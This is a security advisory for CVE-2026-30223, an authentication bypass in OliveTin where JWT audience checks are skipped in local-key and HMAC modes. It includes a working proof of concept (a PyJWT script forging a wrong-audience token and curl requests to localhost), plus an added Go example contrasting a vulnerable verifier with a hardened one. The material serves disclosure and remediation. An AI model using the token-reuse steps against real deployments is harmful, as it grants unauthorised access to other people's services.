CVE-2026-30223

Severity: HIGH 8.8 | EPSS: 0.04%

OliveTin has JWT Audience Validation Bypass in Local Key and HMAC Modes

Published: 3/5/2026 | Modified: 3/23/2026

Description

### Summary

When JWT authentication is configured using either:

- `authJwtPubKeyPath` (local RSA public key), or
- `authJwtHmacSecret` (HMAC secret),

the configured audience value (`authJwtAud`) is not enforced during token parsing. As a result, validly signed JWTs with an incorrect `aud` claim are accepted for authentication. This allows authentication with tokens that were issued for a different audience/service.

### Details

**Affected Code**

File: `jwt.go`
Lines: 51–59, 144–157, 161–168

**Current Behavior**

Remote JWKS Mode (Correct):

```go
return jwt.Parse(jwtToken, jwksVerifier.Keyfunc, jwt.WithAudience(cfg.AuthJwtAud))
```

Audience validation is enforced.

Local Public Key Mode (Vulnerable):

```go
return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })
```

No `jwt.WithAudience()` option is provided.

HMAC Mode (Vulnerable):

```go
return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })
```

No `jwt.WithAudience()` option is provided.

**Why This Is Vulnerable:** `authJwtAud` is ignored in the `authJwtPubKeyPath` and `authJwtHmacSecret` modes, so any token that verifies against the configured key is accepted regardless of its `aud` claim. The JWKS path already shows the correct pattern: the same `jwt.WithAudience(cfg.AuthJwtAud)` option needs to be passed to `jwt.Parse` in both of the other modes.

### PoC

1. **Configure OliveTin**

   Use a minimal config with JWT local key authentication:

   ```yaml
   authJwtPubKeyPath: ./public.pem
   authJwtHeader: Authorization
   authJwtClaimUsername: sub
   authJwtAud: expected-audience
   authRequireGuestsToLogin: true
   ```

2. **Generate a Wrong-Audience Token**

   Sign a token with the private key matching `public.pem`, using an `aud` value that does not match `authJwtAud` (requires PyJWT):

   ```bash
   python3 - <<EOF
   import jwt, datetime  # PyJWT

   with open("private.pem") as f:
       key = f.read()

   token = jwt.encode(
       {
           "sub": "low",
           "aud": "wrong-audience",  # intentionally wrong
           "exp": datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(minutes=30),
       },
       key,
       algorithm="RS256",
   )
   print(token)
   EOF
   ```

   The printed token is used below as `$WRONG_AUD_TOKEN`.

3. **Test Without Token (Baseline)**

   ```bash
   curl -i -X POST http://localhost:1337/api/WhoAmI \
     -H 'Content-Type: application/json' \
     -d '{}'
   ```

   Expected response:

   ```
   HTTP/1.1 401 Unauthorized
   ```

4. **Test With Wrong-Audience Token**

   ```bash
   curl -i -X POST http://localhost:1337/api/WhoAmI \
     -H 'Content-Type: application/json' \
     -H "Authorization: Bearer $WRONG_AUD_TOKEN" \
     -d '{}'
   ```

   Expected response:

   ```
   HTTP/1.1 200 OK
   {"authenticatedUser":"low","provider":"jwt","usergroup":"","acls":[],"sid":""}
   ```

   Authentication succeeds even though the `aud` claim is incorrect.

### Impact

An attacker who possesses a valid JWT signed by the configured key (or HMAC secret) but intended for a different audience can authenticate successfully. This enables:

- Cross-service token reuse
- Authentication using tokens issued for other systems
- Trust boundary violation in multi-service environments

This is particularly severe when:

- OliveTin is deployed behind a centralized SSO provider
- The same signing key is reused across services
- Audience restrictions are relied upon for service isolation

This does **not** bypass ACL authorization. It is strictly an authentication validation flaw.
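The pattern behind the Details and PoC sections, shown as an added example that is not OliveTin's code and does not use the golang-jwt library: a minimal HS256 verifier written against the Go standard library, in which the audience check is a separate, opt-in step, exactly as it is when `jwt.Parse` is called with or without `jwt.WithAudience`. Calling `parseHS256` with an empty expected audience reproduces the behaviour the advisory describes for the local-key and HMAC modes (HMAC stands in for both key types here); calling it with the configured audience is the hardened behaviour of the JWKS mode. The function names, the secret and the audience strings are all constructed for this example.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
	"time"
)

var (
	b64                 = base64.RawURLEncoding
	ErrMalformed        = errors.New("jwt: malformed token or unexpected alg")
	ErrBadSignature     = errors.New("jwt: signature mismatch")
	ErrExpired          = errors.New("jwt: token expired")
	ErrAudienceMismatch = errors.New("jwt: audience mismatch")
)

type claims struct {
	Sub string          `json:"sub"`
	Aud json.RawMessage `json:"aud"` // kept raw: RFC 7519 allows a string or an array of strings
	Exp int64           `json:"exp"`
}

func hs256(secret []byte, signingInput string) []byte {
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(signingInput))
	return mac.Sum(nil)
}

// signHS256 plays the issuer, or an attacker holding a token that was legitimately
// issued to another service sharing the same secret (the advisory's Impact scenario).
func signHS256(secret []byte, sub, aud string, exp int64) string {
	header, _ := json.Marshal(map[string]string{"alg": "HS256", "typ": "JWT"})
	payload, _ := json.Marshal(map[string]any{"sub": sub, "aud": aud, "exp": exp})
	signingInput := b64.EncodeToString(header) + "." + b64.EncodeToString(payload)
	return signingInput + "." + b64.EncodeToString(hs256(secret, signingInput))
}

// parseHS256 verifies structure, alg, signature and expiry, then checks "aud" only
// when expectedAud is non-empty. Passing "" reproduces the advisory's local-key and
// HMAC modes (jwt.Parse with no jwt.WithAudience); a real value matches the JWKS mode.
func parseHS256(token string, secret []byte, expectedAud string) (*claims, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, ErrMalformed
	}
	var hdr struct{ Alg string } // alg is pinned: no "none", no RS256 key confusion
	rawHdr, err := b64.DecodeString(parts[0])
	if err != nil || json.Unmarshal(rawHdr, &hdr) != nil || hdr.Alg != "HS256" {
		return nil, ErrMalformed
	}
	sig, err := b64.DecodeString(parts[2])
	if err != nil || !hmac.Equal(sig, hs256(secret, parts[0]+"."+parts[1])) {
		return nil, ErrBadSignature
	}
	var c claims
	rawClaims, err := b64.DecodeString(parts[1])
	if err != nil || json.Unmarshal(rawClaims, &c) != nil {
		return nil, ErrMalformed
	}
	if c.Exp != 0 && time.Now().Unix() >= c.Exp {
		return nil, ErrExpired
	}
	if expectedAud != "" && !audienceContains(c.Aud, expectedAud) {
		return nil, ErrAudienceMismatch
	}
	return &c, nil
}

// audienceContains accepts both encodings RFC 7519 permits for "aud".
func audienceContains(raw json.RawMessage, want string) bool {
	var single string
	if json.Unmarshal(raw, &single) == nil {
		return single == want
	}
	var many []string
	_ = json.Unmarshal(raw, &many) // an absent or malformed aud leaves many nil
	for _, a := range many {
		if a == want {
			return true
		}
	}
	return false
}

func main() {
	secret := []byte("shared-hmac-secret") // constructed example value, not a real secret
	wrong := signHS256(secret, "low", "wrong-audience", time.Now().Add(30*time.Minute).Unix())
	_, unchecked := parseHS256(wrong, secret, "")
	_, checked := parseHS256(wrong, secret, "expected-audience")
	fmt.Println("no audience check:", unchecked, "| audience check:", checked)
}
```

Two points worth carrying back to a real deployment: the signature check alone proves only that the issuer signed the token, not that it was meant for this service, so the audience check is what enforces the trust boundary the Impact section describes; and because an empty expected audience disables the check in this example, a verifier that behaves the same way is silently unprotected when the audience setting is left blank, so confirm `authJwtAud` is actually set rather than assuming the option is doing its job.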

Affected packages (2)

CVSS scores

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 3.1 | HIGH 8.8 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |

References (5)